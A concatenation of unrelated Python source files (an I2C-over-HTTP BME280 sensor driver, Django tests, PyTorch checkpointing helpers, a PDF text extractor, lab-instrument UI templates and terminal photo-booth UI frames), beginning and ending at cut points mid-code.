except ValueError:
print("i2c failed scan")
class I2cHttpDevice:
def __init__(self, ip, dev_addr):
# device address should be hex string
self.url = 'http://' + ip + '/i2c/'
self.dev_addr = enforce_hex(dev_addr)
def read(self, reg_addr, len_read):
"""
read len_read bytes starting from register reg_addr
:param reg_addr: (str) register address to read in hex
:param len_read: (int) number of bytes to read
:return: bytestring of data
"""
assert len_read < 256, "num of bytes to read cannot exceed 255"
hex_reg_addr = enforce_hex(reg_addr)
try:
req_url = '%sread/%s/%s/%d' % (self.url, self.dev_addr, hex_reg_addr, len_read)
resp = requests.get(url=req_url)
return binascii.a2b_hex(resp.content)
except ValueError:
print("i2c failed read")
def write(self, reg_addr, data, len_data=0):
"""
:param reg_addr: (str) register address to write to in hex
:param data: (str or bytes) hex-encoded bytes, ie: '014ce8'
:param len_data: (optional int) dummy variable to support code portability
:return: None
"""
hex_reg_addr = enforce_hex(reg_addr)
if type(data) == bytes:
# to work across python 2+3:
# https://izziswift.com/whats-the-correct-way-to-convert-bytes-to-a-hex-string-in-python-3/
data = getencoder('hex')(data)[0].decode('ascii')
try:
req_url = '%swrite/%s/%s/%s' % (self.url, self.dev_addr, hex_reg_addr, data)
requests.get(url=req_url)
except ValueError:
print("i2c device 0x%s failed write" % self.dev_addr)
class BME280(I2cHttpDevice):
"""
Bosch BME280
https://www.bosch-sensortec.com/media/boschsensortec/downloads/datasheets/bst-bme280-ds002.pdf
code adapted from BME280.py, http://abyz.me.uk/rpi/pigpio/examples.html (2016-08-05)
This example shows that porting the original code to use the Wifi
Papaya Controller is straightforward and minimal
"""
_calib00 = 0x88
_T1 = 0x88 - _calib00
_T2 = 0x8A - _calib00
_T3 = 0x8C - _calib00
_P1 = 0x8E - _calib00
_P2 = 0x90 - _calib00
_P3 = 0x92 - _calib00
_P4 = 0x94 - _calib00
_P5 = 0x96 - _calib00
_P6 = 0x98 - _calib00
_P7 = 0x9A - _calib00
_P8 = 0x9C - _calib00
_P9 = 0x9E - _calib00
_H1 = 0xA1 - _calib00
_chip_id = 0xD0
_reset = 0xE0
_calib26 = 0xE1
_H2 = 0xE1 - _calib26
_H3 = 0xE3 - _calib26
_xE4 = 0xE4 - _calib26
_xE5 = 0xE5 - _calib26
_xE6 = 0xE6 - _calib26
_H6 = 0xE7 - _calib26
_ctrl_hum = 0xF2
_status = 0xF3
_ctrl_meas = 0xF4
_config = 0xF5
_rawdata = 0xF7
_press = 0xF7
_temp = 0xFA
_humid = 0xFD
_p_msb = 0xF7 - _rawdata
_p_lsb = 0xF8 - _rawdata
_p_xlsb = 0xF9 - _rawdata
_t_msb = 0xFA - _rawdata
_t_lsb = 0xFB - _rawdata
_t_xlsb = 0xFC - _rawdata
_h_msb = 0xFD - _rawdata
_h_lsb = 0xFE - _rawdata
_os_ms = [0, 1, 2, 4, 8, 16]
def __init__(self, i2c_conn, gpib_addr, sampling):
super().__init__(i2c_conn, gpib_addr)
# additional initialization procedure
self.sampling = sampling
self._load_calibration()
self.measure_delay = self._measurement_time(sampling, sampling, sampling)
self.t_fine = 0.0
def _s16(self, _calib, off):
v = self._u16(_calib, off)
if v > 32767:
v -= 65536
return v
def _u16(self, _calib, off):
return _calib[off] | (_calib[off + 1] << 8)
def _u8(self, _calib, off):
return _calib[off]
def _s8(self, _calib, off):
v = self._u8(_calib, off)
if v > 127:
v -= 256
return v
def _measurement_time(self, os_temp, os_press, os_hum):
ms = ((1.25 + 2.3 * self._os_ms[os_temp]) +
(0.575 + 2.3 * self._os_ms[os_press]) +
(0.575 + 2.3 * self._os_ms[os_hum]))
return ms / 1000.0
def _load_calibration(self):
d1 = self.read(self._calib00, 26)
self.T1 = self._u16(d1, self._T1)
self.T2 = self._s16(d1, self._T2)
self.T3 = self._s16(d1, self._T3)
self.P1 = self._u16(d1, self._P1)
self.P2 = self._s16(d1, self._P2)
self.P3 = self._s16(d1, self._P3)
self.P4 = self._s16(d1, self._P4)
self.P5 = self._s16(d1, self._P5)
self.P6 = self._s16(d1, self._P6)
self.P7 = self._s16(d1, self._P7)
self.P8 = self._s16(d1, self._P8)
self.P9 = self._s16(d1, self._P9)
self.H1 = self._u8(d1, self._H1)
d2 = self.read(self._calib26, 7)
self.H2 = self._s16(d2, self._H2)
self.H3 = self._u8(d2, self._H3)
t = self._u8(d2, self._xE5)
t_l = t & 15
t_h = (t >> 4) & 15
self.H4 = (self._u8(d2, self._xE4) << 4) | t_l
if self.H4 > 2047:
self.H4 -= 4096
self.H5 = (self._u8(d2, self._xE6) << 4) | t_h
if self.H5 > 2047:
self.H5 -= 4096
self.H6 = self._s8(d2, self._H6)
def _read_raw_data(self):
# write control bytes for oversampling config
self.write(self._ctrl_hum, bytes([self.sampling]), 1)
self.write(self._ctrl_meas, bytes([self.sampling << 5 | self.sampling << 2 | 1]), 1)
time.sleep(self.measure_delay)
# read 8 bytes starting from register self._rawdata
d = self.read(self._rawdata, 8)
# print(''.join(format(x, '02x') for x in d))
msb = d[self._t_msb]
lsb = d[self._t_lsb]
xlsb = d[self._t_xlsb]
raw_t = ((msb << 16) | (lsb << 8) | xlsb) >> 4
msb = d[self._p_msb]
lsb = d[self._p_lsb]
xlsb = d[self._p_xlsb]
raw_p = ((msb << 16) | (lsb << 8) | xlsb) >> 4
msb = d[self._h_msb]
lsb = d[self._h_lsb]
raw_h = (msb << 8) | lsb
return raw_t, raw_p, raw_h
def read_temp(self):
# write measurement control byte
self.write(self._ctrl_meas, bytes([self.sampling << 5 | self.sampling << 2 | 1]), 1)
time.sleep(self.measure_delay)
# read 3 bytes starting from register self._temp
d = self.read(self._temp, 3)
# print(''.join(format(x, '02x') for x in d))
msb, lsb, xlsb = d
raw_t = ((msb << 16) | (lsb << 8) | xlsb) >> 4
var1 = (raw_t / 16384.0 - (self.T1) / 1024.0) * float(self.T2)
var2 = (((raw_t) / 131072.0 - (self.T1) / 8192.0) *
((raw_t) / 131072.0 - (self.T1) / 8192.0)) * (self.T3)
self.t_fine = var1 + var2
t = (var1 + var2) / 5120.0
return t
def read_data(self):
raw_t, raw_p, raw_h = self._read_raw_data()
var1 = (raw_t / 16384.0 - (self.T1) / 1024.0) * float(self.T2)
var2 = (((raw_t) / 131072.0 - (self.T1) / 8192.0) *
((raw_t) / 131072.0 - (self.T1) / 8192.0)) * (self.T3)
self.t_fine = var1 + var2
t = (var1 + var2) / 5120.0
var1 = (self.t_fine / 2.0) - 64000.0
var2 = var1 * var1 * self.P6 / 32768.0
var2 = var2 + (var1 * self.P5 * 2.0)
var2 = (var2 / 4.0) + (self.P4 * 65536.0)
var1 = ((self.P3 * var1 * var1 / 524288.0) + (self.P2 * var1)) / 524288.0
var1 = (1.0 + var1 / 32768.0) * self.P1
if var1 != 0.0:
p = 1048576.0 - raw_p
p = (p - (var2 / 4096.0)) * 6250.0 / var1
var1 = self.P9 * p * p / 2147483648.0
var2 = p * self.P8 / 32768.0
p = p + (var1 + var2 + self.P7) / 16.0
else:
p = 0
h = self.t_fine - 76800.0
h = ((raw_h - ((self.H4) * 64.0 + (self.H5) / 16384.0 * h)) *
((self.H2) / 65536.0 * (1.0 + (self.H6) / 67108864.0 * h *
(1.0 + (self.H3) / 67108864.0 * h))))
h = h * (1.0 - self.H1 * h / 524288.0)
if h > 100.0:
h = 100.0
elif h < 0.0:
h = 0.0
return t, p, h
|
"""
:mod:`asp_cml` Alexander Street Press Classical Music Library Job
"""
__author__ = "Jeremy Nelson"
from asp_base import AlexanderStreetPressMusicJob
class AlexanderStreetPressClassicalMusicLibrary(AlexanderStreetPressMusicJob):
def __init__(self,marc_file,**kwargs):
"""
Creates instance of `AlexanderStreetPressClassicalMusicLibrary`
"""
kwargs['asp_code'] = 'clmu'
kwargs['proxy'] = '0-clmu.alexanderstreet.com.tiger.coloradocollege.edu'
AlexanderStreetPressMusicJob.__init__(self,marc_file,**kwargs)
|
from django.shortcuts import reverse
from model_bakery import baker
from ..models import EnvironmentProject
from glitchtip.test_utils.test_case import GlitchTipTestCase
class EnvironmentTestCase(GlitchTipTestCase):
def setUp(self):
self.create_user_and_project()
self.url = reverse(
"organization-environments-list",
kwargs={"organization_slug": self.organization.slug},
)
def test_environments(self):
environment = baker.make(
"environments.Environment", organization=self.organization
)
baker.make(
"environments.EnvironmentProject",
environment=environment,
project=self.project,
)
other_environment = baker.make("environments.Environment")
baker.make(
"environments.EnvironmentProject",
environment=other_environment,
project=self.project,
)
res = self.client.get(self.url)
self.assertContains(res, environment.name)
self.assertNotContains(res, other_environment.name)
def test_hide_environments(self):
environment_project1 = baker.make(
"environments.EnvironmentProject",
project=self.project,
environment__organization=self.organization,
is_hidden=False,
)
environment_project2 = baker.make(
"environments.EnvironmentProject",
project=self.project,
environment__organization=self.organization,
is_hidden=True,
)
res = self.client.get(self.url)
self.assertContains(res, environment_project1.environment.name)
self.assertNotContains(res, environment_project2.environment.name)
class EnvironmentProjectTestCase(GlitchTipTestCase):
def setUp(self):
self.create_user_and_project()
def test_environment_projects(self):
url = reverse(
"project-environments-list",
kwargs={"project_pk": f"{self.organization.slug}/{self.project.slug}"},
)
environment_project = baker.make(
"environments.EnvironmentProject",
project=self.project,
environment__organization=self.organization,
)
other_environment_project = baker.make("environments.EnvironmentProject")
another_environment_project = baker.make(
"environments.EnvironmentProject",
environment__organization=self.organization,
)
res = self.client.get(url)
self.assertContains(res, environment_project.environment.name)
self.assertNotContains(res, other_environment_project.environment.name)
self.assertNotContains(res, another_environment_project.environment.name)
def test_make_hidden(self):
environment_project = baker.make(
"environments.EnvironmentProject",
is_hidden=False,
project=self.project,
environment__organization=self.organization,
)
detail_url = reverse(
"project-environments-detail",
kwargs={
"project_pk": f"{self.organization.slug}/{self.project.slug}",
"environment__name": environment_project.environment.name,
},
)
data = {"name": environment_project.environment.name, "isHidden": True}
res = self.client.put(detail_url, data)
self.assertContains(res, "true")
self.assertTrue(EnvironmentProject.objects.filter(is_hidden=True).exists())
|
import torch
from torchsupport.flex.checkpointing.savable import (
savable_of, Savable, SaveStateError
)
@savable_of(torch.nn.Module)
class SaveModule(Savable):
def __init__(self, module):
if isinstance(module, torch.nn.DataParallel):
module = module.module
self.module = module
def write(self, data, name):
for param in self.module.parameters():
if torch.isnan(param).any():
raise SaveStateError("Encountered NaN weights!")
data[name] = self.module.state_dict()
def read(self, data, name):
self.module.load_state_dict(data[name])
@savable_of(torch.Tensor)
class SaveTensor(Savable):
def __init__(self, tensor):
self.tensor = tensor
def write(self, data, name):
data[name] = self.tensor
def read(self, data, name):
self.tensor[:] = data[name]
|
import io
from pdfminer.converter import TextConverter
from pdfminer.pdfinterp import PDFPageInterpreter
from pdfminer.pdfinterp import PDFResourceManager
from pdfminer.pdfpage import PDFPage
def extract_text_from_pdf(pdf_path):
"""Extract the content of a PDF file as text."""
resource_manager = PDFResourceManager()
fake_file_handle = io.StringIO()
converter = TextConverter(resource_manager, fake_file_handle)
page_interpreter = PDFPageInterpreter(resource_manager, converter)
with open(pdf_path, 'rb') as fh:
for page in PDFPage.get_pages(fh,
caching=True,
check_extractable=True):
page_interpreter.process_page(page)
text = fake_file_handle.getvalue()
# close open handles
converter.close()
fake_file_handle.close()
if text:
return text
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import csv
import os
from traits.api import HasTraits, Float, Enum, List, Int, \
File, Property, Button, on_trait_change, Any, Event, cached_property
from traits.trait_errors import TraitError
from traitsui.api import View, UItem, HGroup, Item, spring, VGroup
from traitsui.tabular_adapter import TabularAdapter
from pychron.core.helpers.strtools import to_csv_str
from pychron.core.ui.enum_editor import myEnumEditor
from pychron.core.ui.tabular_editor import myTabularEditor
from pychron.envisage.icon_button_editor import icon_button_editor
from pychron.experiment.utilities.save_dialog import IncrementalHeatTemplateSaveDialog
from pychron.paths import paths
from pychron.pychron_constants import alphas
from pychron.viewable import Viewable
# paths.build('_experiment')
# build_directories(paths)
class BaseIncrementalHeatAdapter(TabularAdapter):
columns = [('Step', 'step_id'),
('Value', 'value'),
('Units', 'units'),
('Duration (s)', 'duration'),
('Cleanup (s)', 'cleanup')]
step_id_width = Int(40)
step_id_text = Property
units_text = Property
def _get_units_text(self):
return self.item.units
def _set_units_text(self, v):
try:
self.item.units = v
except TraitError:
pass
def _get_step_id_text(self):
return alphas(self.item.step_id - 1)
class LaserIncrementalHeatAdapter(BaseIncrementalHeatAdapter):
columns = [('Step', 'step_id'),
('Value', 'value'),
('Units', 'units'),
('Duration (s)', 'duration'),
('Cleanup (s)', 'cleanup'),
('Beam Diameter', 'beam_diameter')]
beam_diameter_text = Property
def _get_beam_diameter_text(self):
bd = self.item.beam_diameter
if bd is None:
bd = ''
return bd
class BaseIncrementalHeatStep(HasTraits):
step_id = Int
duration = Float
cleanup = Float
value = Float
units = Enum('watts', 'temp', 'percent')
# is_ok = Property
step = Property(depends_on='step_id')
@cached_property
def _get_step(self):
return alphas(self.step_id - 1)
def make_row(self):
return self.value, self.units, self.duration, self.cleanup
def make_dict(self, gdur, gcleanup):
dur = self.duration
if not dur:
dur = gdur
cleanup = self.cleanup
if not cleanup:
cleanup = gcleanup
d = dict(extract_value=self.value,
extract_units=self.units,
duration=dur,
cleanup=cleanup)
return d
def to_string(self):
return to_csv_str(self.make_row())
@property
def is_valid(self):
return self.value and self.duration
class LaserIncrementalHeatStep(BaseIncrementalHeatStep):
beam_diameter = Property(depends_on='_beam_diameter')
_beam_diameter = Float(default_value=None)
def make_dict(self, gdur, gcleanup):
d = super(LaserIncrementalHeatStep, self).make_dict(gdur, gcleanup)
if self.beam_diameter is not None:
d['beam_diameter'] = self.beam_diameter
return d
def make_row(self):
return self.value, self.units, self.duration, \
self.cleanup, self.beam_diameter if self.beam_diameter is not None else ''
def _get_beam_diameter(self):
return self._beam_diameter
def _set_beam_diameter(self, v):
self._beam_diameter = v
class BaseIncrementalHeatTemplate(Viewable):
steps = List
step_klass = BaseIncrementalHeatStep
adapter_klass = BaseIncrementalHeatAdapter
name = Property(depends_on='path')
path = File
names = List
save_button = Button('save')
save_as_button = Button('save as')
add_row = Button('add step')
title = Property
selected = Any
refresh_needed = Event
units = Enum('', 'watts', 'temp', 'percent')
gduration = Float
gcleanup = Float
# ===============================================================================
# persistence
# ===============================================================================
def load(self, path):
self.path = path
self.steps = []
with open(path, 'r') as rfile:
reader = csv.reader(rfile)
header = next(reader)
cnt = 1
for row in reader:
if row:
params = self._parse_row(row, header)
step = self.step_klass(step_id=cnt,
**params)
self.steps.append(step)
cnt += 1
def dump(self, path):
with open(path, 'w') as wfile:
writer = csv.writer(wfile)
header = ('value', 'units', 'duration', 'cleanup', 'beam_diameter')
writer.writerow(header)
for step in self.steps:
writer.writerow(step.make_row())
# private
def _parse_row(self, row, header):
params = dict()
for a, cast in (('value', float), ('units', str),
('duration', float), ('cleanup', float)):
idx = header.index(a)
params[a] = cast(row[idx])
return params
def _gduration_changed(self):
self._set_steps_attr('duration', self.gduration)
def _gcleanup_changed(self):
self._set_steps_attr('cleanup', self.gcleanup)
def _units_changed(self):
self._set_steps_attr('units', self.units)
def _set_steps_attr(self, attr, v):
steps = self.selected
if not steps:
steps = [s for s in self.steps if s.value]
for si in steps:
setattr(si, attr, v)
self.refresh_needed = True
def _get_title(self):
if self.path:
return os.path.basename(self.path)
else:
return ' '
def _steps_default(self):
return [self.step_klass(step_id=i + 1) for i in range(20)]
def _get_name(self):
return os.path.basename(self.path)
def _set_name(self, v):
self.load(os.path.join(paths.incremental_heat_template_dir, v))
# def _calculate_similarity(self, template2):
# with open(self.path, 'r') as rfile:
# s1 = rfile.read()
#
# with open(template2.path, 'r') as rfile:
# s2 = rfile.read()
#
# e = 0
# s1s = [l for l in s1.splitlines() if l.split(',')!=0.0]
# s2s = [l for l in s1.splitlines() if l.split(',')!=0.0]
#
# if len
# diff = ndiff(s1.splitlines(), s2.splitlines(), linejunk=lambda x: x.sp)
# for line in diff:
# if line[0] == '?':
# e += 1
#
# print line
# print e
# return e
#
# def _check_similarity(self):
# sims = []
# temps = list_directory(paths.incremental_heat_template_dir, extension='.txt')
# for ti in temps:
# if ti == self.name:
# continue
#
# t = self.__class__()
# p = os.path.join(paths.incremental_heat_template_dir, ti)
# try:
# t.load(p)
# except BaseException:
# self.debug('invalid template {}. removing this file'.format(p))
# os.remove(p)
# continue
#
# e = self._calculate_similarity(t)
# if e < 10:
# sims.append(ti)
# return sims
# ===============================================================================
# handlers
# ===============================================================================
@on_trait_change('steps[]')
def _steps_updated(self):
for i, si in enumerate(self.steps):
si.step_id = i + 1
def _add_row_fired(self):
if self.selected:
for si in self.selected:
step = si.clone_traits()
self.steps.append(step)
else:
if self.steps:
step = self.steps[-1].clone_traits()
else:
step = self.step_klass()
self.steps.append(step)
def _save_button_fired(self):
# sims = self._check_similarity()
# if sims:
# if not self.confirmation_dialog('Similar templates already exist. \n{}\n'
# 'Are you sure you want to save this template?'.format('\n'.join(sims))):
# return
self.dump(self.path)
self.close_ui()
def _save_as_button_fired(self):
# sims = self._check_similarity()
# if sims:
# if not self.confirmation_dialog('Similar templates already exist. {}\n '
# 'Are you sure you want to save this template?'.format(','.join(sims))):
# return
steps = [s for s in self.steps if s.is_valid]
n = len(steps)
dlg = IncrementalHeatTemplateSaveDialog(n=n, root=paths.incremental_heat_template_dir)
path = dlg.get_path()
if path:
self.dump(path)
self.path = path
self.close_ui()
def traits_view(self):
editor = myTabularEditor(adapter=self.adapter_klass(),
refresh='refresh_needed',
selected='selected',
# copy_cache='copy_cache',
# pasted='pasted',
multi_select=True)
# cols=[ObjectColumn(name='step', label='Step', editable=False),
# ObjectColumn(name='value',label='Value'),
# ObjectColumn(name='units',label='Units'),
# ObjectColumn(name='duration', label='Duration (S)'),
# ObjectColumn(name='cleanup', label='Cleanup (S)')]
#
# editor=TableEditor(columns=cols, selected='selected',
# deletable=True,
# show_toolbar=True,
# selection_mode='rows', sortable=False)
v = View(VGroup(HGroup(UItem('name', editor=myEnumEditor(name='names')),
icon_button_editor('add_row', 'table_add'), spring,
Item('gduration', label='Duration'),
Item('gcleanup', label='Cleanup'),
Item('units')),
UItem('steps',
style='custom',
editor=editor),
HGroup(UItem('save_button', enabled_when='path'),
UItem('save_as_button'))),
height=500,
width=900,
resizable=True,
title=self.title,
handler=self.handler_klass)
return v
class LaserIncrementalHeatTemplate(BaseIncrementalHeatTemplate):
step_klass = LaserIncrementalHeatStep
adapter_klass = LaserIncrementalHeatAdapter
def _parse_row(self, row, header):
params = super(LaserIncrementalHeatTemplate, self)._parse_row(row, header)
try:
idx = header.index('beam_diameter')
except ValueError:
idx = None
if idx is not None:
v = row[idx]
if v.strip():
try:
params['beam_diameter'] = float(v)
except ValueError:
self.warning('Invalid beam_diameter value {}'.format(v))
return params
if __name__ == '__main__':
paths.build('_dev')
im = LaserIncrementalHeatTemplate()
im.load(os.path.join(paths.incremental_heat_template_dir,
'a.txt'
))
# for i in range(10):
# im.steps.append(IncrementalHeatStep(step_id=i + 1))
im.configure_traits()
# ============= EOF =============================================
|
#!/usr/bin/env python
import xml.dom.ext
from xml.dom.ext.reader import Sax2
from xml import xpath
filename = "example.xml"
print "Demo started."
reader = Sax2.Reader()
doc = reader.fromStream(filename)
#xml.dom.ext.PrettyPrint(doc)
#xml.dom.ext.Print(doc)
mod_list = xpath.Evaluate('/configuration/module', doc.documentElement)
for mod in mod_list:
name = xpath.Evaluate("@name", mod)[0].nodeValue
print "Module Name: %s" % name
param_list = xpath.Evaluate('parameter', mod)
for param in param_list:
name = xpath.Evaluate('@name', param)[0].nodeValue
val = xpath.Evaluate('text()', param)[0].nodeValue
print "%s = %s" % (name, val)
|
''' cat that kitten '''
from catms import app
if __name__ == '__main__':
app.run()
|
import logging
from datetime import datetime
from gettext import translation
from typing import Any, Callable
from asciimatics.effects import Effect, Print
from asciimatics.event import Event, KeyboardEvent
from asciimatics.exceptions import NextScene, StopApplication
from asciimatics.renderers import Box, ColourImageFile, StaticRenderer
from asciimatics.screen import Screen
from asciimatics.widgets import (
Button, CheckBox, FileBrowser, Frame, Label, Layout
)
from skunkbooth.utils.dropdownlist import \
DropdownList # Delete this on next asciimatics release
from skunkbooth.utils.settings import settings
from .webcam import Webcam
temp = translation("base", localedir="locales", languages=[settings["LANGUAGE"]])
temp.install()
_ = temp.gettext
APP_TITLE = _("Skunkbooth")
class ImageSelectionModel(object):
"""Model to hold selected image path"""
def __init__(self, path: str = "") -> None:
"""Initialize model"""
self._path = path
def set_path(self, path: str) -> None:
"""Setter"""
self._path = path
def get_path(self) -> str:
"""Getter"""
return self._path
class MainFrame(Frame):
"""Recreatable frame to implement main ui"""
def __init__(
self, screen: Any, webcam: Webcam, toggle: Callable, camera_effect: Effect
) -> None:
"""Initialize frame"""
super(MainFrame, self).__init__(
screen,
3,
screen.width - 4,
x=2,
y=screen.height - 4,
hover_focus=True,
can_scroll=False,
title=APP_TITLE,
has_border=False,
reduce_cpu=True,
)
# Made the labels below short so as to fit small screens
self._gallery_button = Button(_("🖼 Gallery"), self._gallery, add_box=True)
self._effects_button = Button(_("🖌 Effects"), self._filters, add_box=True)
self._camera_button = Button(_("📷 Shoot"), self._shoot, add_box=True)
self._settings_button = Button(_("🔧 Settings"), self._settings, add_box=True)
self._video_recording = CheckBox(_("⏯︎ Record"), on_change=toggle)
self._quit_button = Button(_("🛑 Quit"), self._quit, add_box=True)
box = Box(screen.width, screen.height, uni=True)
box_effect = Print(screen, box, y=0)
self.add_effect(box_effect)
title_effect = Print(
screen,
StaticRenderer(images=[" " + APP_TITLE + " "]),
y=0,
transparent=False,
x=int(((screen.width - 4) / 2) - 5),
attr=1,
)
self.add_effect(title_effect)
self.add_effect(camera_effect)
controls_layout = Layout([1, 1, 1, 1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._gallery_button, 0)
controls_layout.add_widget(self._video_recording, 1)
controls_layout.add_widget(self._camera_button, 2)
controls_layout.add_widget(self._effects_button, 3)
controls_layout.add_widget(self._settings_button, 4)
controls_layout.add_widget(self._quit_button, 5)
self.set_theme("bright")
self.fix()
self.webcam = webcam
logging.debug("Mainframe initialized")
@staticmethod
def _filters() -> None:
"""Open effects"""
logging.debug("Effects was clicked")
raise NextScene("Filters")
@staticmethod
def _gallery() -> None:
"""Open gallery"""
logging.debug("Gallery was clicked")
raise NextScene("Gallery")
# @staticmethod
def _shoot(self) -> None:
"""Take an image"""
logging.debug("Camera was clicked")
if settings["IMG_FORMAT"] == "ASCII":
ext = ".txt"
else:
ext = f".{settings['IMG_FORMAT']}"
img_name = (
f"{settings['PIC_DIR']}/Image-{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}{ext}"
)
logging.info(f"Saving image {img_name}")
self.webcam.take_picture_and_save(img_name)
self._screen.refresh()
def _settings(self) -> None:
"""Go to settings page"""
logging.debug("Settings was clicked")
raise NextScene("Settings")
@staticmethod
def _quit() -> None:
"""Quit application"""
logging.debug("Application was stopped")
raise StopApplication("User pressed quit")
class GalleryFrame(Frame):
"""Recreatable frame to implement gallery ui"""
def __init__(self, screen: Any, model: ImageSelectionModel) -> None:
"""Initialize frame"""
super(GalleryFrame, self).__init__(
screen,
screen.height,
screen.width,
y=0,
hover_focus=True,
has_border=True,
can_scroll=False,
on_load=self._render_browser,
title=APP_TITLE,
reduce_cpu=True,
)
self._model = model
self._back_camera_button = Button(_("👈 Back to 📷"), self._switch_to_camera, add_box=True)
title_layout = Layout([1])
self.add_layout(title_layout)
self.files_layout = Layout([100], fill_frame=True)
self.add_layout(self.files_layout)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
title_layout.add_widget(Label(_("Gallery"), align="^", height=screen.height // 16))
controls_layout.add_widget(self._back_camera_button, 1)
self.set_theme("bright")
logging.debug("Galleryframe initialized")
def _render_browser(self) -> None:
"""Open file browser"""
logging.debug("File browser opened")
self.files_layout.clear_widgets()
self._browser = FileBrowser(
self.screen.height - 8, settings["PIC_DIR"], on_select=self._open_image
)
self.files_layout.add_widget(self._browser)
self.fix()
def _open_image(self) -> None:
"""Opening image preview"""
if self._browser.value.endswith(".jpg"):
logging.info(f"Image selected in gallery :{self._browser.value}")
self._model.set_path(self._browser.value)
raise NextScene("Preview")
@staticmethod
def _switch_to_camera() -> None:
"""Switch to Camera from Gallery"""
logging.debug("Switched to Camera from Gallery")
raise NextScene("Main")
class FilterFrame(Frame):
"""Recreatable frame to implement filter ui"""
def __init__(self, screen: Any, filters: Any, data: Any = None) -> None:
"""Initialize frame"""
super().__init__(
screen,
screen.height,
screen.width,
hover_focus=True,
can_scroll=True,
title=APP_TITLE,
data=data,
reduce_cpu=True,
)
self._back_camera_button = Button(_("👈 Back to 📷"), self._switch_to_camera, add_box=True)
self.filters = filters
self.filterList = [[i, None] for i in filters.filters]
title_layout = Layout([1])
self.add_layout(title_layout)
title_layout.add_widget(Label(_("Filters"), align="^", height=screen.height // 16))
filters_layout = Layout([100, 100], fill_frame=True)
self.add_layout(filters_layout)
for f in self.filterList:
temp = CheckBox(f[0].name, name=f[0].name)
f[1] = temp
logging.debug(f"{f[0].name} button created")
filters_layout.add_widget(temp)
filters_layout.add_widget(Label(f"{f[0].description} ]", align=">"), 1)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._back_camera_button, 1)
self.set_theme("bright")
self.fix()
logging.debug("Galleryframe initialized")
def _switch_to_camera(self) -> None:
"""Switch to Camera from Filters"""
logging.debug("Switched to Camera from Filters")
for i in self.filterList:
logging.debug(f"{i[0]}, {self.filters.is_loaded(i[0])}, {i[1].value}")
if self.filters.is_loaded(i[0].name) != i[1].value:
self.filters.toggle(i[0].name)
self.save()
raise NextScene("Main")
def _skip_to_next_page(self) -> None:
"""Function to skip to next page of filters"""
pass
def process_event(self, event: Event) -> None:
"""Deals with keyboard events that happen in this screen"""
super(FilterFrame, self).process_event(event)
if isinstance(event, KeyboardEvent):
c = event.key_code
layout = self._layouts[1]
if c == Screen.KEY_HOME:
self.switch_focus(layout, 0, 0)
elif c == Screen.KEY_END:
self.switch_focus(layout, 0, len(self.filterList) - 1)
elif c == Screen.KEY_PAGE_UP:
pass
elif c == Screen.KEY_PAGE_DOWN:
pass
class PreviewFrame(Frame):
"""Recreatable frame to implement preview ui"""
def __init__(self, screen: Any, model: ImageSelectionModel) -> None:
"""Initialize frame"""
super(PreviewFrame, self).__init__(
screen,
3,
screen.width - 4,
x=2,
y=screen.height - 4,
on_load=self._render_image,
hover_focus=True,
has_border=False,
can_scroll=False,
title=APP_TITLE,
reduce_cpu=True,
)
self._model = model
self._back_gallery_button = Button(_("👈 Back to 🖼"), self._switch_to_gallery, add_box=True)
box = Box(screen.width, screen.height, uni=True)
box_effect = Print(screen, box, y=0)
self.add_effect(box_effect)
title_effect = Print(
screen,
StaticRenderer(images=[" " + APP_TITLE + " "]),
y=0,
x=int(((screen.width - 4) / 2) - 5),
attr=1,
transparent=False,
)
self.add_effect(title_effect)
header_effect = Print(
screen,
StaticRenderer(images=[_("Photo Preview")]),
y=1,
x=int(((screen.width - 4) / 2) - 5),
attr=1,
colour=2, # GreenColor
transparent=False,
)
self.add_effect(header_effect)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._back_gallery_button, 1)
self.set_theme("bright")
self.fix()
logging.debug("Previewframe initialized")
def _render_image(self) -> None:
"""Open selected image"""
logging.debug(f"Image opened in preview {self._model.get_path()}")
preview_effect = Print(
self.screen,
ColourImageFile(
self.screen, self._model.get_path(), height=self.screen.height - 8, uni=True
),
y=4,
speed=0,
transparent=False,
)
self.add_effect(preview_effect)
@staticmethod
def _switch_to_gallery() -> None:
"""Switch to Gallery from Preview"""
logging.debug("Switched to Gallery from Preview")
raise NextScene("Gallery")
class SettingsFrame(Frame):
"""Recreatable frame to implement settings ui"""
def __init__(self, screen: Any) -> None:
"""Initialize frame"""
super().__init__(
screen,
screen.height,
screen.width,
hover_focus=True,
can_scroll=True,
title=APP_TITLE,
)
self._back_camera_button = Button(_("👈 Back to 📷"), self._switch_to_camera, add_box=True)
title_layout = Layout([1])
self.add_layout(title_layout)
title_layout.add_widget(Label(_("Settings"), align="^", height=screen.height // 16))
settings_layout = Layout([100], fill_frame=True)
self.add_layout(settings_layout)
imageFormat = DropdownList(
[("JPG", "JPG"), ("PNG", "PNG"), ("ASCII", "ASCII")], _("Image output format")
)
imageFormat.value = settings["IMG_FORMAT"]
imageFormat._on_change = lambda: settings.update({"IMG_FORMAT": imageFormat.value})
settings_layout.add_widget(imageFormat)
language = DropdownList([("English", "en"), ("Esperanto", "eo")], _("Language"))
language.value = settings["LANGUAGE"]
def _switchLanguage() -> None:
settings.update({"LANGUAGE": language.value})
temp = translation("base", localedir="locales", languages=[language.value])
temp.install()
global _
_ = temp.gettext
screen.lang_switch = True
language._on_change = _switchLanguage
settings_layout.add_widget(language)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._back_camera_button, 1)
self.set_theme("bright")
self.fix()
logging.debug("Settingsframe initialized")
def _switch_to_camera(self) -> None:
"""Switch to Camera from settings"""
logging.debug("Switched to Camera from settings")
raise NextScene("Main")
def process_event(self, event: Event) -> None:
"""Deals with keyboard events that happen in this screen"""
super(SettingsFrame, self).process_event(event)
if isinstance(event, KeyboardEvent):
